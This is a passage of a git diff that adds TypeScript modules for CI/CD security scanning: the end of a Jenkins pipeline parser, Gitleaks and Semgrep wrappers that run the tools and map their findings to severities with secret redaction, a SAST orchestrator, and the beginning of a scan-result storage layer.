+    let match
+    while ((match = libPattern.exec(content)) !== null) {
+      const libRef = match[1] || match[2]
+
+      // Parse individual library references
+      const libRefs = libRef.split(",").map((l) => l.trim().replace(/['"]/g, ""))
+      for (const lib of libRefs) {
+        const [name, version] = lib.split("@")
+        libs.push({
+          name: name.trim(),
+          version: version?.trim(),
+          pinned: false, // Jenkins shared libraries typically use branches
+          trusted: false,
+          file: filePath,
+          line: ProviderUtils.getLineNumber(content, lib),
+          official: false,
+        })
+      }
+    }
+
+    // Parse library() step calls
+    const libStepPattern = /library\s*(?:identifier:\s*)?['"]([^'"@]+)(?:@([^'"]+))?['"]/g
+    while ((match = libStepPattern.exec(content)) !== null) {
+      libs.push({
+        name: match[1],
+        version: match[2],
+        pinned: false,
+        trusted: false,
+        file: filePath,
+        line: ProviderUtils.getLineNumber(content, match[0]),
+        official: false,
+      })
+    }
+
+    return libs
+  }
+
+  validate(pipeline: CICDTypes.PipelineConfig): string[] {
+    const errors: string[] = []
+
+    if (pipeline.jobs.length === 0) {
+      errors.push("Jenkinsfile has no stages defined")
+    }
+
+    for (const job of pipeline.jobs) {
+      if (job.steps.length === 0) {
+        errors.push(`Stage '${job.name}' has no steps defined`)
+      }
+    }
+
+    return errors
+  }
+
+  extractActions(pipeline: CICDTypes.PipelineConfig): CICDTypes.ActionReference[] {
+    return pipeline.actions
+  }
+
+  extractSecrets(pipeline: CICDTypes.PipelineConfig): CICDTypes.SecretReference[] {
+    return pipeline.secrets
+  }
+
+  extractPermissions(pipeline: CICDTypes.PipelineConfig): CICDTypes.Permission[] {
+    return pipeline.permissions
+  }
+}
+
+/** Singleton instance */
+export const JenkinsProvider = new JenkinsPipelineProvider()
diff --git a/packages/opencode/src/pentest/cicd/sast/gitleaks.ts b/packages/opencode/src/pentest/cicd/sast/gitleaks.ts
new file mode 100644
index 00000000000..6ddc1280078
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/sast/gitleaks.ts
@@ -0,0 +1,406 @@
+/**
+ * @fileoverview Gitleaks SAST Integration
+ *
+ * Integration with Gitleaks for secret detection in CI/CD
+ * configurations and repository history.
+ */
+
+import { spawn } from "child_process"
+import { Log } from "../../../util/log"
+import { CICDTypes } from "../types"
+
+const log = Log.create({ name: "cicd-sast-gitleaks" })
+
+/** Gitleaks scan options */
+export interface GitleaksOptions {
+  /** Target directory to scan */
+  target: string
+  /** Scan mode: detect (current state) or protect (staged/committed) */
+  mode?: "detect" | "protect"
+  /** Custom config file path */
+  config?: string
+  /** Scan git history */
+  history?: boolean
+  /** Limit history depth */
+  depth?: number
+  /** Exclude paths */
+  exclude?: string[]
+  /** Timeout in milliseconds */
+  timeout?: number
+  /** Verbose output */
+  verbose?: boolean
+}
+
+/** Gitleaks JSON output format */
+interface GitleaksOutput {
+  Description: string
+  StartLine: number
+  EndLine: number
+  StartColumn: number
+  EndColumn: number
+  Match: string
+  Secret: string
+  File: string
+  Commit: string
+  Entropy: number
+  Author: string
+  Email: string
+  Date: string
+  Message: string
+  Tags: string[]
+  RuleID: string
+  Fingerprint: string
+}
+
+export namespace GitleaksIntegration {
+  /**
+   * Check if Gitleaks is available
+   */
+  export async function isAvailable(): Promise<boolean> {
+    return new Promise((resolve) => {
+      const proc = spawn("gitleaks", ["version"], {
+        stdio: "pipe",
+      })
+
+      proc.on("error", () => resolve(false))
+      proc.on("close", (code) => resolve(code === 0))
+    })
+  }
+
+  /**
+   * Get Gitleaks version
+   */
+  export async function getVersion(): Promise<string | null> {
+    return new Promise((resolve) => {
+      const proc = spawn("gitleaks", ["version"], {
+        stdio: "pipe",
+      })
+
+      let output = ""
+      proc.stdout?.on("data", (data) => {
+        output += data.toString()
+      })
+
+      proc.on("error", () => resolve(null))
+      proc.on("close", (code) => {
+        if (code === 0) {
+          // Gitleaks outputs version like "v8.18.0"
+          const match = output.match(/v?\d+\.\d+\.\d+/)
+          resolve(match?.[0] || output.trim())
+        } else {
+          resolve(null)
+        }
+      })
+    })
+  }
+
+  /**
+   * Run Gitleaks scan
+   */
+  export async function scan(options: GitleaksOptions): Promise<CICDTypes.SASTResult> {
+    const startTime = Date.now()
+    const errors: string[] = []
+
+    // Check if Gitleaks is available
+    const available = await isAvailable()
+    if (!available) {
+      log.warn("Gitleaks is not installed or not in PATH")
+      return {
+        tool: "gitleaks",
+        findings: [],
+        stats: {
+          filesScanned: 0,
+          rulesRun: 0,
+          findingsCount: 0,
+          duration: Date.now() - startTime,
+        },
+        errors: ["Gitleaks is not installed. Install from: https://github.com/gitleaks/gitleaks"],
+        completedAt: Date.now(),
+      }
+    }
+
+    const version = await getVersion()
+
+    // Build command arguments
+    const args = buildArgs(options)
+
+    log.info("Running Gitleaks scan", {
+      target: options.target,
+      mode: options.mode || "detect",
+      history: options.history,
+    })
+
+    return new Promise((resolve) => {
+      const timeout = options.timeout || 120000 // 2 minutes default
+      let output = ""
+      let stderr = ""
+
+      const proc = spawn("gitleaks", args, {
+        stdio: "pipe",
+        timeout,
+      })
+
+      proc.stdout?.on("data", (data) => {
+        output += data.toString()
+      })
+
+      proc.stderr?.on("data", (data) => {
+        stderr += data.toString()
+      })
+
+      const timeoutId = setTimeout(() => {
+        proc.kill("SIGTERM")
+        errors.push("Gitleaks scan timed out")
+      }, timeout)
+
+      proc.on("error", (err) => {
+        clearTimeout(timeoutId)
+        errors.push(`Gitleaks execution error: ${err.message}`)
+        resolve({
+          tool: "gitleaks",
+          version: version || undefined,
+          findings: [],
+          stats: {
+            filesScanned: 0,
+            rulesRun: 0,
+            findingsCount: 0,
+            duration: Date.now() - startTime,
+          },
+          errors,
+          completedAt: Date.now(),
+        })
+      })
+
+      proc.on("close", (code) => {
+        clearTimeout(timeoutId)
+
+        // Gitleaks exit codes:
+        // 0 = no leaks found
+        // 1 = leaks found
+        // Other = error
+        if (code !== 0 && code !== 1) {
+          errors.push(`Gitleaks exited with code ${code}`)
+          if (stderr) {
+            errors.push(stderr)
+          }
+        }
+
+        try {
+          const result = parseOutput(output)
+
+          resolve({
+            tool: "gitleaks",
+            version: version || undefined,
+            findings: result.findings,
+            stats: {
+              filesScanned: result.filesScanned,
+              rulesRun: result.rulesMatched,
+              findingsCount: result.findings.length,
+              duration: Date.now() - startTime,
+            },
+            errors,
+            completedAt: Date.now(),
+          })
+        } catch (err) {
+          errors.push(`Failed to parse Gitleaks output: ${(err as Error).message}`)
+          resolve({
+            tool: "gitleaks",
+            version: version || undefined,
+            findings: [],
+            stats: {
+              filesScanned: 0,
+              rulesRun: 0,
+              findingsCount: 0,
+              duration: Date.now() - startTime,
+            },
+            errors,
+            completedAt: Date.now(),
+          })
+        }
+      })
+    })
+  }
+
+  /**
+   * Build Gitleaks command arguments
+   */
+  function buildArgs(options: GitleaksOptions): string[] {
+    const args: string[] = []
+
+    // Command mode
+    const mode = options.mode || "detect"
+    args.push(mode)
+
+    // Source path
+    args.push("--source", options.target)
+
+    // Output format
+    args.push("--report-format", "json")
+    args.push("--report-path", "/dev/stdout")
+
+    // Custom config
+    if (options.config) {
+      args.push("--config", options.config)
+    }
+
+    // No git mode (scan current state only)
+    if (!options.history) {
+      args.push("--no-git")
+    }
+
+    // Git log depth
+    if (options.history && options.depth) {
+      args.push("--log-opts", `--max-count=${options.depth}`)
+    }
+
+    // Verbose
+    if (options.verbose) {
+      args.push("--verbose")
+    }
+
+    return args
+  }
+
+  /**
+   * Parse Gitleaks JSON output
+   */
+  function parseOutput(output: string): {
+    findings: CICDTypes.SASTFinding[]
+    filesScanned: number
+    rulesMatched: number
+  } {
+    const findings: CICDTypes.SASTFinding[] = []
+    const filesFound = new Set<string>()
+    const rulesMatched = new Set<string>()
+
+    if (!output.trim() || output.trim() === "[]") {
+      return { findings, filesScanned: 0, rulesMatched: 0 }
+    }
+
+    try {
+      const parsed = JSON.parse(output) as GitleaksOutput[]
+
+      if (!Array.isArray(parsed)) {
+        return { findings, filesScanned: 0, rulesMatched: 0 }
+      }
+
+      for (const result of parsed) {
+        filesFound.add(result.File)
+        rulesMatched.add(result.RuleID)
+
+        findings.push({
+          id: generateFindingId(),
+          tool: "gitleaks",
+          ruleId: result.RuleID,
+          ruleName: result.Description,
+          severity: mapRuleToSeverity(result.RuleID, result.Entropy),
+          message: `${result.Description}: ${redactSecret(result.Secret)}`,
+          file: result.File,
+          startLine: result.StartLine,
+          endLine: result.EndLine,
+          startColumn: result.StartColumn,
+          endColumn: result.EndColumn,
+          snippet: result.Match,
+          metadata: {
+            entropy: result.Entropy,
+            commit: result.Commit || undefined,
+            author: result.Author || undefined,
+            date: result.Date || undefined,
+            fingerprint: result.Fingerprint,
+            tags: result.Tags,
+          },
+        })
+      }
+    } catch {
+      // Not valid JSON, might be empty or error message
+    }
+
+    return {
+      findings,
+      filesScanned: filesFound.size,
+      rulesMatched: rulesMatched.size,
+    }
+  }
+
+  /**
+   * Map Gitleaks rule to severity
+   */
+  function mapRuleToSeverity(ruleId: string, entropy: number): CICDTypes.Severity {
+    const lower = ruleId.toLowerCase()
+
+    // Critical: Production credentials and keys
+    if (lower.includes("private-key") ||
+        lower.includes("aws-secret") ||
+        lower.includes("gcp-service-account") ||
+        lower.includes("azure-storage")) {
+      return "critical"
+    }
+
+    // High: API keys and tokens
+    if (lower.includes("api-key") ||
+        lower.includes("token") ||
+        lower.includes("password") ||
+        lower.includes("credential")) {
+      return "high"
+    }
+
+    // Use entropy as additional signal
+    if (entropy > 5.0) {
+      return "high"
+    }
+
+    if (entropy > 4.0) {
+      return "medium"
+    }
+
+    return "medium"
+  }
+
+  /**
+   * Redact a secret for safe display
+   */
+  function redactSecret(secret: string): string {
+    if (!secret || secret.length <= 8) {
+      return "*".repeat(secret?.length || 8)
+    }
+
+    const visible = Math.min(4, Math.floor(secret.length / 4))
+    return secret.slice(0, visible) + "*".repeat(secret.length - visible * 2) + secret.slice(-visible)
+  }
+
+  /**
+   * Generate unique finding ID
+   */
+  function generateFindingId(): string {
+    return `gl_${Date.now().toString(36)}_${Math.random().toString(36).slice(2, 8)}`
+  }
+
+  /**
+   * Convert SAST findings to CI/CD findings
+   */
+  export function toFindings(
+    sastFindings: CICDTypes.SASTFinding[],
+    scanId?: string
+  ): CICDTypes.CICDFinding[] {
+    return sastFindings.map((sf) => ({
+      id: sf.id,
+      category: "secrets" as const,
+      severity: sf.severity,
+      title: `[Gitleaks] ${sf.ruleName || sf.ruleId}`,
+      description: sf.message,
+      file: sf.file,
+      line: sf.startLine,
+      column: sf.startColumn,
+      evidence: sf.snippet,
+      remediation: "Remove the secret from the repository and rotate the credential. Consider using git-filter-repo to remove from history.",
+      references: [
+        "https://github.com/gitleaks/gitleaks",
+        "https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/removing-sensitive-data-from-a-repository",
+      ],
+      cwe: "CWE-798",
+      falsePositive: false,
+      suppressed: false,
+      foundAt: Date.now(),
+    }))
+  }
+}
diff --git a/packages/opencode/src/pentest/cicd/sast/index.ts b/packages/opencode/src/pentest/cicd/sast/index.ts
new file mode 100644
index 00000000000..14ba39a8b48
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/sast/index.ts
@@ -0,0 +1,285 @@
+/**
+ * @fileoverview SAST Integration Index
+ *
+ * Orchestrates SAST tool execution for CI/CD security scanning.
+ */
+
+export * from "./semgrep"
+export * from "./gitleaks"
+
+import { Log } from "../../../util/log"
+import { Bus } from "../../../bus"
+import { CICDTypes } from "../types"
+import { CICDEvents } from "../events"
+import { SemgrepIntegration } from "./semgrep"
+import type { SemgrepOptions } from "./semgrep"
+import { GitleaksIntegration } from "./gitleaks"
+import type { GitleaksOptions } from "./gitleaks"
+
+const log = Log.create({ name: "cicd-sast" })
+
+/** SAST orchestration options */
+export interface SASTOrchestrationOptions {
+  /** Tools to run */
+  tools: CICDTypes.SASTTool[]
+  /** Target directory */
+  target: string
+  /** Overall timeout */
+  timeout?: number
+  /** Semgrep-specific options */
+  semgrep?: Partial<SemgrepOptions>
+  /** Gitleaks-specific options */
+  gitleaks?: Partial<GitleaksOptions>
+  /** Scan ID for event tracking */
+  scanId?: string
+}
+
+/** SAST orchestration result */
+export interface SASTOrchestrationResult {
+  results: CICDTypes.SASTResult[]
+  findings: CICDTypes.CICDFinding[]
+  stats: {
+    toolsRun: number
+    toolsSucceeded: number
+    totalFindings: number
+    duration: number
+  }
+  errors: string[]
+}
+
+export namespace SASTOrchestrator {
+  /**
+   * Check which SAST tools are available
+   */
+  export async function checkAvailability(): Promise<Record<CICDTypes.SASTTool, boolean>> {
+    const [semgrep, gitleaks] = await Promise.all([
+      SemgrepIntegration.isAvailable(),
+      GitleaksIntegration.isAvailable(),
+    ])
+
+    return {
+      semgrep,
+      gitleaks,
+      trufflehog: false, // Not implemented
+      codeql: false, // Not implemented
+    }
+  }
+
+  /**
+   * Run SAST analysis with configured tools
+   */
+  export async function run(
+    options: SASTOrchestrationOptions
+  ): Promise<SASTOrchestrationResult> {
+    const startTime = Date.now()
+    const results: CICDTypes.SASTResult[] = []
+    const allFindings: CICDTypes.CICDFinding[] = []
+    const errors: string[] = []
+    let toolsSucceeded = 0
+
+    log.info("Starting SAST analysis", {
+      tools: options.tools,
+      target: options.target,
+    })
+
+    // Emit start event
+    if (options.scanId) {
+      await Bus.publish(CICDEvents.SASTStarted, {
+        scanID: options.scanId,
+        target: options.target,
+        tools: options.tools,
+      })
+    }
+
+    // Check tool availability
+    const availability = await checkAvailability()
+
+    // Run each configured tool
+    for (const tool of options.tools) {
+      if (!availability[tool]) {
+        log.warn(`SAST tool ${tool} is not available, skipping`)
+        errors.push(`${tool} is not installed or not available`)
+        continue
+      }
+
+      try {
+        const toolStartTime = Date.now()
+        let result: CICDTypes.SASTResult
+
+        switch (tool) {
+          case "semgrep":
+            result = await SemgrepIntegration.scan({
+              target: options.target,
+              timeout: options.timeout,
+              ...options.semgrep,
+            })
+            break
+
+          case "gitleaks":
+            result = await GitleaksIntegration.scan({
+              target: options.target,
+              timeout: options.timeout,
+              ...options.gitleaks,
+            })
+            break
+
+          default:
+            log.warn(`SAST tool ${tool} is not implemented`)
+            errors.push(`${tool} is not implemented`)
+            continue
+        }
+
+        results.push(result)
+
+        // Convert to CI/CD findings
+        const cicdFindings = convertToFindings(result, tool)
+        allFindings.push(...cicdFindings)
+
+        if (result.errors.length === 0) {
+          toolsSucceeded++
+        }
+
+        // Emit tool completed event
+        if (options.scanId) {
+          await Bus.publish(CICDEvents.SASTToolCompleted, {
+            scanID: options.scanId,
+            tool,
+            findingsCount: result.findings.length,
+            duration: Date.now() - toolStartTime,
+          })
+        }
+
+        log.info(`SAST tool ${tool} completed`, {
+          findings: result.findings.length,
+          duration: Date.now() - toolStartTime,
+        })
+      } catch (err) {
+        const errMsg = `${tool} failed: ${(err as Error).message}`
+        log.error(errMsg)
+        errors.push(errMsg)
+      }
+    }
+
+    const duration = Date.now() - startTime
+
+    // Emit completion event
+    if (options.scanId) {
+      const byTool: Record<string, number> = {}
+      for (const result of results) {
+        byTool[result.tool] = result.findings.length
+      }
+
+      await Bus.publish(CICDEvents.SASTCompleted, {
+        scanID: options.scanId,
+        totalFindings: allFindings.length,
+        byTool,
+        duration,
+      })
+    }
+
+    log.info("SAST analysis completed", {
+      toolsRun: options.tools.length,
+      toolsSucceeded,
+      totalFindings: allFindings.length,
+      duration,
+    })
+
+    return {
+      results,
+      findings: allFindings,
+      stats: {
+        toolsRun: options.tools.length,
+        toolsSucceeded,
+        totalFindings: allFindings.length,
+        duration,
+      },
+      errors,
+    }
+  }
+
+  /**
+   * Convert SAST result to CI/CD findings
+   */
+  function convertToFindings(
+    result: CICDTypes.SASTResult,
+    tool: CICDTypes.SASTTool
+  ): CICDTypes.CICDFinding[] {
+    switch (tool) {
+      case "semgrep":
+        return SemgrepIntegration.toFindings(result.findings)
+      case "gitleaks":
+        return GitleaksIntegration.toFindings(result.findings)
+      default:
+        return result.findings.map((sf) => ({
+          id: sf.id,
+          category: "misconfiguration" as const,
+          severity: sf.severity,
+          title: `[${tool}] ${sf.ruleName || sf.ruleId}`,
+          description: sf.message,
+          file: sf.file,
+          line: sf.startLine,
+          column: sf.startColumn,
+          evidence: sf.snippet,
+          remediation: sf.fix,
+          references: [],
+          falsePositive: false,
+          suppressed: false,
+          foundAt: Date.now(),
+        }))
+    }
+  }
+
+  /**
+   * Quick SAST scan with default settings
+   */
+  export async function quickScan(
+    target: string,
+    scanId?: string
+  ): Promise<SASTOrchestrationResult> {
+    const availability = await checkAvailability()
+    const tools: CICDTypes.SASTTool[] = []
+
+    if (availability.gitleaks) {
+      tools.push("gitleaks")
+    }
+
+    return run({
+      tools,
+      target,
+      timeout: 60000, // 1 minute for quick scan
+      scanId,
+      gitleaks: {
+        history: false, // Current state only
+      },
+    })
+  }
+
+  /**
+   * Full SAST scan with all available tools
+   */
+  export async function fullScan(
+    target: string,
+    scanId?: string
+  ): Promise<SASTOrchestrationResult> {
+    const availability = await checkAvailability()
+    const tools: CICDTypes.SASTTool[] = []
+
+    if (availability.semgrep) {
+      tools.push("semgrep")
+    }
+    if (availability.gitleaks) {
+      tools.push("gitleaks")
+    }
+
+    return run({
+      tools,
+      target,
+      timeout: 300000, // 5 minutes for full scan
+      scanId,
+      gitleaks: {
+        history: true,
+        depth: 100, // Last 100 commits
+      },
+    })
+  }
+}
diff --git a/packages/opencode/src/pentest/cicd/sast/semgrep.ts b/packages/opencode/src/pentest/cicd/sast/semgrep.ts
new file mode 100644
index 00000000000..b68706c9d48
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/sast/semgrep.ts
@@ -0,0 +1,416 @@
+/**
+ * @fileoverview Semgrep SAST Integration
+ *
+ * Integration with Semgrep for static application security testing
+ * of CI/CD pipeline configurations.
+ */
+
+import { spawn } from "child_process"
+import { Log } from "../../../util/log"
+import { CICDTypes } from "../types"
+
+const log = Log.create({ name: "cicd-sast-semgrep" })
+
+/** Semgrep scan options */
+export interface SemgrepOptions {
+  /** Target directory to scan */
+  target: string
+  /** Semgrep ruleset to use */
+  config?: string | string[]
+  /** Additional include patterns */
+  include?: string[]
+  /** Exclude patterns */
+  exclude?: string[]
+  /** Timeout in milliseconds */
+  timeout?: number
+  /** Use verbose output */
+  verbose?: boolean
+}
+
+/** Semgrep JSON output format */
+interface SemgrepOutput {
+  results: SemgrepResult[]
+  errors: SemgrepError[]
+  version: string
+  paths: {
+    scanned: string[]
+    skipped: Array<{ path: string; reason: string }>
+  }
+}
+
+interface SemgrepResult {
+  check_id: string
+  path: string
+  start: { line: number; col: number; offset: number }
+  end: { line: number; col: number; offset: number }
+  extra: {
+    message: string
+    severity: string
+    metadata: Record<string, unknown>
+    fix?: string
+    lines: string
+  }
+}
+
+interface SemgrepError {
+  message: string
+  level: string
+  path?: string
+}
+
+export namespace SemgrepIntegration {
+  /** Default Semgrep config for CI/CD scanning */
+  const DEFAULT_CONFIGS = [
+    "p/github-actions",
+    "p/gitlab",
+    "p/supply-chain",
+    "p/secrets",
+  ]
+
+  /** CI/CD file patterns to include */
+  const CICD_PATTERNS = [
+    "*.yml",
+    "*.yaml",
+    "Jenkinsfile*",
+    "*.groovy",
+  ]
+
+  /**
+   * Check if Semgrep is available
+   */
+  export async function isAvailable(): Promise<boolean> {
+    return new Promise((resolve) => {
+      const proc = spawn("semgrep", ["--version"], {
+        stdio: "pipe",
+      })
+
+      proc.on("error", () => resolve(false))
+      proc.on("close", (code) => resolve(code === 0))
+    })
+  }
+
+  /**
+   * Get Semgrep version
+   */
+  export async function getVersion(): Promise<string | null> {
+    return new Promise((resolve) => {
+      const proc = spawn("semgrep", ["--version"], {
+        stdio: "pipe",
+      })
+
+      let output = ""
+      proc.stdout?.on("data", (data) => {
+        output += data.toString()
+      })
+
+      proc.on("error", () => resolve(null))
+      proc.on("close", (code) => {
+        if (code === 0) {
+          resolve(output.trim())
+        } else {
+          resolve(null)
+        }
+      })
+    })
+  }
+
+  /**
+   * Run Semgrep scan
+   */
+  export async function scan(options: SemgrepOptions): Promise<CICDTypes.SASTResult> {
+    const startTime = Date.now()
+    const errors: string[] = []
+
+    // Check if Semgrep is available
+    const available = await isAvailable()
+    if (!available) {
+      log.warn("Semgrep is not installed or not in PATH")
+      return {
+        tool: "semgrep",
+        findings: [],
+        stats: {
+          filesScanned: 0,
+          rulesRun: 0,
+          findingsCount: 0,
+          duration: Date.now() - startTime,
+        },
+        errors: ["Semgrep is not installed. Install with: pip install semgrep"],
+        completedAt: Date.now(),
+      }
+    }
+
+    const version = await getVersion()
+
+    // Build command arguments
+    const args = buildArgs(options)
+
+    log.info("Running Semgrep scan", { target: options.target, config: options.config })
+
+    return new Promise((resolve) => {
+      const timeout = options.timeout || 300000 // 5 minutes default
+      let output = ""
+      let stderr = ""
+
+      const proc = spawn("semgrep", args, {
+        stdio: "pipe",
+        timeout,
+      })
+
+      proc.stdout?.on("data", (data) => {
+        output += data.toString()
+      })
+
+      proc.stderr?.on("data", (data) => {
+        stderr += data.toString()
+      })
+
+      const timeoutId = setTimeout(() => {
+        proc.kill("SIGTERM")
+        errors.push("Semgrep scan timed out")
+      }, timeout)
+
+      proc.on("error", (err) => {
+        clearTimeout(timeoutId)
+        errors.push(`Semgrep execution error: ${err.message}`)
+        resolve({
+          tool: "semgrep",
+          version: version || undefined,
+          findings: [],
+          stats: {
+            filesScanned: 0,
+            rulesRun: 0,
+            findingsCount: 0,
+            duration: Date.now() - startTime,
+          },
+          errors,
+          completedAt: Date.now(),
+        })
+      })
+
+      proc.on("close", (code) => {
+        clearTimeout(timeoutId)
+
+        if (code !== 0 && code !== 1) {
+          // Semgrep returns 1 when findings are found
+          errors.push(`Semgrep exited with code ${code}`)
+          if (stderr) {
+            errors.push(stderr)
+          }
+        }
+
+        try {
+          const result = parseOutput(output, options.target)
+
+          resolve({
+            tool: "semgrep",
+            version: version || undefined,
+            findings: result.findings,
+            stats: {
+              filesScanned: result.filesScanned,
+              rulesRun: result.rulesRun,
+              findingsCount: result.findings.length,
+              duration: Date.now() - startTime,
+            },
+            errors: [...errors, ...result.errors],
+            completedAt: Date.now(),
+          })
+        } catch (err) {
+          errors.push(`Failed to parse Semgrep output: ${(err as Error).message}`)
+          resolve({
+            tool: "semgrep",
+            version: version || undefined,
+            findings: [],
+            stats: {
+              filesScanned: 0,
+              rulesRun: 0,
+              findingsCount: 0,
+              duration: Date.now() - startTime,
+            },
+            errors,
+            completedAt: Date.now(),
+          })
+        }
+      })
+    })
+  }
+
+  /**
+   * Build Semgrep command arguments
+   */
+  function buildArgs(options: SemgrepOptions): string[] {
+    const args: string[] = []
+
+    // Output format
+    args.push("--json")
+
+    // Config/rulesets
+    const configs = options.config
+      ? (Array.isArray(options.config) ? options.config : [options.config])
+      : DEFAULT_CONFIGS
+
+    for (const config of configs) {
+      args.push("--config", config)
+    }
+
+    // Include patterns
+    const includes = options.include || CICD_PATTERNS
+    for (const pattern of includes) {
+      args.push("--include", pattern)
+    }
+
+    // Exclude patterns
+    const excludes = options.exclude || ["node_modules", "vendor", ".git", "dist", "build"]
+    for (const pattern of excludes) {
+      args.push("--exclude", pattern)
+    }
+
+    // Verbose mode
+    if (options.verbose) {
+      args.push("--verbose")
+    }
+
+    // Target directory
+    args.push(options.target)
+
+    return args
+  }
+
+  /**
+   * Parse Semgrep JSON output
+   */
+  function parseOutput(
+    output: string,
+    target: string
+  ): {
+    findings: CICDTypes.SASTFinding[]
+    filesScanned: number
+    rulesRun: number
+    errors: string[]
+  } {
+    const findings: CICDTypes.SASTFinding[] = []
+    const errors: string[] = []
+    let filesScanned = 0
+    let rulesRun = 0
+
+    if (!output.trim()) {
+      return { findings, filesScanned, rulesRun, errors: ["Empty Semgrep output"] }
+    }
+
+    try {
+      const parsed = JSON.parse(output) as SemgrepOutput
+
+      filesScanned = parsed.paths?.scanned?.length || 0
+
+      // Convert Semgrep results to our format
+      for (const result of parsed.results || []) {
+        findings.push({
+          id: generateFindingId(),
+          tool: "semgrep",
+          ruleId: result.check_id,
+          ruleName: result.check_id.split(".").pop(),
+          severity: mapSeverity(result.extra.severity),
+          message: result.extra.message,
+          file: result.path,
+          startLine: result.start.line,
+          endLine: result.end.line,
+          startColumn: result.start.col,
+          endColumn: result.end.col,
+          snippet: result.extra.lines,
+          fix: result.extra.fix,
+          metadata: result.extra.metadata,
+        })
+      }
+
+      // Collect unique rule IDs to count rules run
+      const ruleIds = new Set(parsed.results?.map((r) => r.check_id) || [])
+      rulesRun = ruleIds.size
+
+      // Add errors from Semgrep
+      for (const error of parsed.errors || []) {
+        if (error.level === "error") {
+          errors.push(error.message)
+        }
+      }
+    } catch (err) {
+      errors.push(`JSON parse error: ${(err as Error).message}`)
+    }
+
+    return { findings, filesScanned, rulesRun, errors }
+  }
+
+  /**
+   * Map Semgrep severity to our severity
+   */
+  function mapSeverity(severity: string): CICDTypes.Severity {
+    switch (severity.toUpperCase()) {
+      case "ERROR":
+        return "critical"
+      case "WARNING":
+        return "high"
+      case "INFO":
+        return "medium"
+      default:
+        return "low"
+    }
+  }
+
+  /**
+   * Generate unique finding ID
+   */
+  function generateFindingId(): string {
+    return `sg_${Date.now().toString(36)}_${Math.random().toString(36).slice(2, 8)}`
+  }
+
+  /**
+   * Convert SAST findings to CI/CD findings
+   */
+  export function toFindings(
+    sastFindings: CICDTypes.SASTFinding[],
+    scanId?: string
+  ): CICDTypes.CICDFinding[] {
+    return sastFindings.map((sf) => ({
+      id: sf.id,
+      category: categorizeRule(sf.ruleId),
+      severity: sf.severity,
+      title: `[Semgrep] ${sf.ruleName || sf.ruleId}`,
+      description: sf.message,
+      file: sf.file,
+      line: sf.startLine,
+      column: sf.startColumn,
+      evidence: sf.snippet,
+      remediation: sf.fix,
+      references: [],
+      falsePositive: false,
+      suppressed: false,
+      foundAt: Date.now(),
+    }))
+  }
+
+  /**
+   * Categorize a Semgrep rule into our finding categories
+   */
+  function categorizeRule(ruleId: string): CICDTypes.FindingCategory {
+    const lower = ruleId.toLowerCase()
+
+    if (lower.includes("secret") || lower.includes("credential") || lower.includes("password") || lower.includes("token")) {
+      return "secrets"
+    }
+    if (lower.includes("permission") || lower.includes("privilege")) {
+      return "permissions"
+    }
+    if (lower.includes("injection") || lower.includes("command") || lower.includes("script")) {
+      return "injection"
+    }
+    if (lower.includes("supply-chain") || lower.includes("action") || lower.includes("dependency")) {
+      return "supply-chain"
+    }
+    if (lower.includes("artifact")) {
+      return "artifact"
+    }
+    if (lower.includes("runner")) {
+      return "runner"
+    }
+
+    return "misconfiguration"
+  }
+}
diff --git a/packages/opencode/src/pentest/cicd/storage.ts b/packages/opencode/src/pentest/cicd/storage.ts
new file mode 100644
index 00000000000..2dd43a24e97
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/storage.ts
@@ -0,0 +1,366 @@
+/**
+ * @fileoverview CI/CD Security Scanner Storage
+ *
+ * Persistence layer for CI/CD scan results with dual-mode support
+ * (in-memory for tests, file-based for production).
+ */
+
+import { randomBytes } from "crypto"
+import { Storage } from "../../storage/storage"
+import { Log } from "../../util/log"
+import { CICDTypes } from "./types"
+
+const log = Log.create({ name: "cicd-storage" })
+
+/** Storage configuration */
+export interface StorageConfig {
+  storage?: "file" | "memory"
+}
+
+/** Generate unique scan ID */
+function generateScanId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `cicd_${timestamp}_${random}`
+}
+
+/** Generate unique finding ID */
+function generateFindingId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(4).toString("hex")
+  return `cf_${timestamp}_${random}`
+}
+
+export namespace CICDStorage {
+  // In-memory buffers for testing
+  const scanBuffer: CICDTypes.CICDScanResult[] = []
+  const pipelineBuffer: CICDTypes.PipelineConfig[] = []
+  const findingBuffer: CICDTypes.CICDFinding[] = []
+
+  // ===== SCAN OPERATIONS =====
+
+  /** Save or update a scan result */
+  export async function saveScan(
+    result: Omit<CICDTypes.CICDScanResult, "id"> | CICDTypes.CICDScanResult,
+    config: StorageConfig = {}
+  ): Promise<CICDTypes.CICDScanResult> {
+    const full: CICDTypes.CICDScanResult = {
+      ...result,
+      id: "id" in result && result.id ? result.id : generateScanId(),
+    }
+    const validated = CICDTypes.CICDScanResult.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = scanBuffer.findIndex((s) => s.id === validated.id)
+      if (existingIdx >= 0) {
+        scanBuffer[existingIdx] = validated
+      } else {
+        scanBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "cicd", "scans", validated.id], validated)
+    }
+
+    log.info("CI/CD scan saved", {
+      id: validated.id,
+      target: validated.target,
+      pipelineCount: validated.pipelines.length,
+      findingsCount: validated.findings.length,
+    })
+
+    return validated
+  }
+
+  /** Get a scan by ID */
+  export async function getScan(
+    id: string,
+    config: StorageConfig = {}
+  ): Promise<CICDTypes.CICDScanResult | null> {
+    try {
+      if (config.storage === "memory") {
+        return scanBuffer.find((s) => s.id === id) || null
+      }
+
+      const data = await Storage.read<CICDTypes.CICDScanResult>(["pentest", "cicd", "scans", id])
+      if (!data) return null
+
+      return CICDTypes.CICDScanResult.parse(data)
+    } catch (err) {
+      log.warn("Failed to read scan", { id, error: String(err) })
+      return null
+    }
+  }
+
+  /** List scans with optional filters */
+  export async function listScans(
+    config: StorageConfig = {},
+    filters?: {
+      target?: string
+      profile?: CICDTypes.ProfileId
+      status?: CICDTypes.Status
+      limit?: number
+    }
+  ): Promise<CICDTypes.CICDScanResult[]> {
+    let scans: CICDTypes.CICDScanResult[]
+
+    if (config.storage === "memory") {
+      scans = [...scanBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "cicd", "scans"])
+      scans = []
+      for (const key of keys) {
+        try {
